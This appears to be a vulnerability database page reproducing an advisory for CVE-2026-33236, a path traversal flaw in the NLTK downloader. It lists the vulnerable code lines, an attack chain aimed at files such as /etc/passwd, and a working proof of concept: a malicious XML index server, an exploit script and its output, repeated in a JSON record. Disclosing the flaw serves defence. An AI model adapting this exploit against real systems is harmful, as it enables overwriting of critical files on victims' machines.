GHSA-469J-VMHF-R6V7

Vulnerability from github – Published: 2026-03-19 12:42 – Updated: 2026-03-25 18:21
VLAI?
Summary
NLTK has a Downloader Path Traversal Vulnerability (AFO) - Arbitrary File Overwrite
Details

Vulnerability Description

The NLTK downloader does not validate the subdir and id attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as ../), which can lead to:

  1. Arbitrary Directory Creation: Create directories at arbitrary locations in the file system
  2. Arbitrary File Creation: Create arbitrary files
  3. Arbitrary File Overwrite: Overwrite critical system files (such as /etc/passwd, ~/.ssh/authorized_keys, etc.)

Vulnerability Principle

Key Code Locations

1. XML Parsing Without Validation (nltk/downloader.py:253)

self.filename = os.path.join(subdir, id + ext)
  • subdir and id are directly from XML attributes without any validation

2. Path Construction Without Checks (nltk/downloader.py:679)

filepath = os.path.join(download_dir, info.filename)
  • Directly uses filename which may contain path traversal

3. Unrestricted Directory Creation (nltk/downloader.py:687)

os.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)
  • Can create arbitrary directories outside the download directory

4. File Writing Without Protection (nltk/downloader.py:695)

with open(filepath, "wb") as outfile:
  • Can write to arbitrary locations in the file system

Attack Chain

1. Attacker controls remote XML index server
   ↓
2. Provides malicious XML: <package id="passwd" subdir="../../etc" .../>
   ↓
3. Victim executes: downloader.download('passwd')
   ↓
4. Package.fromxml() creates object, filename = "../../etc/passwd.zip"
   ↓
5. _download_package() constructs path: download_dir + "../../etc/passwd.zip"
   ↓
6. os.makedirs() creates directory: download_dir + "../../etc"
   ↓
7. open(filepath, "wb") writes file to /etc/passwd.zip
   ↓
8. System file is overwritten!

Impact Scope

  1. System File Overwrite

Reproduction Steps

Environment Setup

  1. Install NLTK
pip install nltk
  1. Prepare malicious server and exploit script (see PoC section)

Reproduction Process

Step 1: Start malicious server

python3 malicious_server.py

Step 2: Run exploit script

python3 exploit_vulnerability.py

Step 3: Verify results

ls -la /tmp/test_file.zip

Proof of Concept

Malicious Server (malicious_server.py)

#!/usr/bin/env python3
"""Malicious HTTP Server - Provides XML index with path traversal"""
import os
import tempfile
import zipfile
from http.server import HTTPServer, BaseHTTPRequestHandler

# Create temporary directory
server_dir = tempfile.mkdtemp(prefix="nltk_malicious_")

# Create malicious XML (contains path traversal)
malicious_xml = """<?xml version="1.0"?>
<nltk_data>
  <packages>
    <package id="test_file" subdir="../../../../../../../../../tmp" 
             url="http://127.0.0.1:8888/test.zip" 
             size="100" unzipped_size="100" unzip="0"/>
  </packages>
</nltk_data>
"""

# Save files
with open(os.path.join(server_dir, "malicious_index.xml"), "w") as f:
    f.write(malicious_xml)

with zipfile.ZipFile(os.path.join(server_dir, "test.zip"), "w") as zf:
    zf.writestr("test.txt", "Path traversal attack!")

# HTTP Handler
class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == '/malicious_index.xml':
            self.send_response(200)
            self.send_header('Content-type', 'application/xml')
            self.end_headers()
            with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f:
                self.wfile.write(f.read())
        elif self.path == '/test.zip':
            self.send_response(200)
            self.send_header('Content-type', 'application/zip')
            self.end_headers()
            with open(os.path.join(server_dir, 'test.zip'), 'rb') as f:
                self.wfile.write(f.read())
        else:
            self.send_response(404)
            self.end_headers()

    def log_message(self, format, *args):
        pass

# Start server
if __name__ == "__main__":
    port = 8888
    server = HTTPServer(("0.0.0.0", port), Handler)
    print(f"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml")
    print("Press Ctrl+C to stop")
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print("\nServer stopped")

Exploit Script (exploit_vulnerability.py)

#!/usr/bin/env python3
"""AFO Vulnerability Exploit Script"""
import os
import tempfile

def exploit(server_url="http://127.0.0.1:8888/malicious_index.xml"):
    download_dir = tempfile.mkdtemp(prefix="nltk_exploit_")
    print(f"Download directory: {download_dir}")

    # Exploit vulnerability
    from nltk.downloader import Downloader
    downloader = Downloader(server_index_url=server_url, download_dir=download_dir)
    downloader.download("test_file", quiet=True)

    # Check results
    expected_path = "/tmp/test_file.zip"
    if os.path.exists(expected_path):
        print(f"\n✗ Exploit successful! File written to: {expected_path}")
        print(f"✗ Path traversal attack successful!")
    else:
        print(f"\n? File not found, download may have failed")

if __name__ == "__main__":
    exploit()

Execution Results

✗ Exploit successful! File written to: /tmp/test_file.zip
✗ Path traversal attack successful!
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "nltk"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "3.9.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33236"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-19T12:42:42Z",
    "nvd_published_at": "2026-03-20T23:16:47Z",
    "severity": "HIGH"
  },
  "details": "## Vulnerability Description\n\nThe NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to:\n\n1. **Arbitrary Directory Creation**: Create directories at arbitrary locations in the file system\n2. **Arbitrary File Creation**: Create arbitrary files\n3. **Arbitrary File Overwrite**: Overwrite critical system files (such as `/etc/passwd`, `~/.ssh/authorized_keys`, etc.)\n\n## Vulnerability Principle\n\n### Key Code Locations\n\n**1. XML Parsing Without Validation** (`nltk/downloader.py:253`)\n```python\nself.filename = os.path.join(subdir, id + ext)\n```\n- `subdir` and `id` are directly from XML attributes without any validation\n\n**2. Path Construction Without Checks** (`nltk/downloader.py:679`)\n```python\nfilepath = os.path.join(download_dir, info.filename)\n```\n- Directly uses `filename` which may contain path traversal\n\n**3. Unrestricted Directory Creation** (`nltk/downloader.py:687`)\n```python\nos.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)\n```\n- Can create arbitrary directories outside the download directory\n\n**4. File Writing Without Protection** (`nltk/downloader.py:695`)\n```python\nwith open(filepath, \"wb\") as outfile:\n```\n- Can write to arbitrary locations in the file system\n\n### Attack Chain\n\n```\n1. Attacker controls remote XML index server\n   \u2193\n2. Provides malicious XML: \u003cpackage id=\"passwd\" subdir=\"../../etc\" .../\u003e\n   \u2193\n3. Victim executes: downloader.download(\u0027passwd\u0027)\n   \u2193\n4. Package.fromxml() creates object, filename = \"../../etc/passwd.zip\"\n   \u2193\n5. _download_package() constructs path: download_dir + \"../../etc/passwd.zip\"\n   \u2193\n6. os.makedirs() creates directory: download_dir + \"../../etc\"\n   \u2193\n7. open(filepath, \"wb\") writes file to /etc/passwd.zip\n   \u2193\n8. System file is overwritten!\n```\n\n## Impact Scope\n1. **System File Overwrite**\n\n## Reproduction Steps\n\n### Environment Setup\n\n1. Install NLTK\n```bash\npip install nltk\n```\n\n2. Prepare malicious server and exploit script (see PoC section)\n\n### Reproduction Process\n\n**Step 1: Start malicious server**\n```bash\npython3 malicious_server.py\n```\n\n**Step 2: Run exploit script**\n```bash\npython3 exploit_vulnerability.py\n```\n\n**Step 3: Verify results**\n```bash\nls -la /tmp/test_file.zip\n```\n\n## Proof of Concept\n\n### Malicious Server (malicious_server.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"Malicious HTTP Server - Provides XML index with path traversal\"\"\"\nimport os\nimport tempfile\nimport zipfile\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\n# Create temporary directory\nserver_dir = tempfile.mkdtemp(prefix=\"nltk_malicious_\")\n\n# Create malicious XML (contains path traversal)\nmalicious_xml = \"\"\"\u003c?xml version=\"1.0\"?\u003e\n\u003cnltk_data\u003e\n  \u003cpackages\u003e\n    \u003cpackage id=\"test_file\" subdir=\"../../../../../../../../../tmp\" \n             url=\"http://127.0.0.1:8888/test.zip\" \n             size=\"100\" unzipped_size=\"100\" unzip=\"0\"/\u003e\n  \u003c/packages\u003e\n\u003c/nltk_data\u003e\n\"\"\"\n\n# Save files\nwith open(os.path.join(server_dir, \"malicious_index.xml\"), \"w\") as f:\n    f.write(malicious_xml)\n\nwith zipfile.ZipFile(os.path.join(server_dir, \"test.zip\"), \"w\") as zf:\n    zf.writestr(\"test.txt\", \"Path traversal attack!\")\n\n# HTTP Handler\nclass Handler(BaseHTTPRequestHandler):\n    def do_GET(self):\n        if self.path == \u0027/malicious_index.xml\u0027:\n            self.send_response(200)\n            self.send_header(\u0027Content-type\u0027, \u0027application/xml\u0027)\n            self.end_headers()\n            with open(os.path.join(server_dir, \u0027malicious_index.xml\u0027), \u0027rb\u0027) as f:\n                self.wfile.write(f.read())\n        elif self.path == \u0027/test.zip\u0027:\n            self.send_response(200)\n            self.send_header(\u0027Content-type\u0027, \u0027application/zip\u0027)\n            self.end_headers()\n            with open(os.path.join(server_dir, \u0027test.zip\u0027), \u0027rb\u0027) as f:\n                self.wfile.write(f.read())\n        else:\n            self.send_response(404)\n            self.end_headers()\n    \n    def log_message(self, format, *args):\n        pass\n\n# Start server\nif __name__ == \"__main__\":\n    port = 8888\n    server = HTTPServer((\"0.0.0.0\", port), Handler)\n    print(f\"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml\")\n    print(\"Press Ctrl+C to stop\")\n    try:\n        server.serve_forever()\n    except KeyboardInterrupt:\n        print(\"\\nServer stopped\")\n```\n\n### Exploit Script (exploit_vulnerability.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"AFO Vulnerability Exploit Script\"\"\"\nimport os\nimport tempfile\n\ndef exploit(server_url=\"http://127.0.0.1:8888/malicious_index.xml\"):\n    download_dir = tempfile.mkdtemp(prefix=\"nltk_exploit_\")\n    print(f\"Download directory: {download_dir}\")\n    \n    # Exploit vulnerability\n    from nltk.downloader import Downloader\n    downloader = Downloader(server_index_url=server_url, download_dir=download_dir)\n    downloader.download(\"test_file\", quiet=True)\n    \n    # Check results\n    expected_path = \"/tmp/test_file.zip\"\n    if os.path.exists(expected_path):\n        print(f\"\\n\u2717 Exploit successful! File written to: {expected_path}\")\n        print(f\"\u2717 Path traversal attack successful!\")\n    else:\n        print(f\"\\n? File not found, download may have failed\")\n\nif __name__ == \"__main__\":\n    exploit()\n```\n\n### Execution Results\n\n```\n\u2717 Exploit successful! File written to: /tmp/test_file.zip\n\u2717 Path traversal attack successful!\n```",
  "id": "GHSA-469j-vmhf-r6v7",
  "modified": "2026-03-25T18:21:27Z",
  "published": "2026-03-19T12:42:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33236"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nltk/nltk/commit/89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nltk/nltk"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "NLTK has a Downloader Path Traversal Vulnerability (AFO) - Arbitrary File Overwrite"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…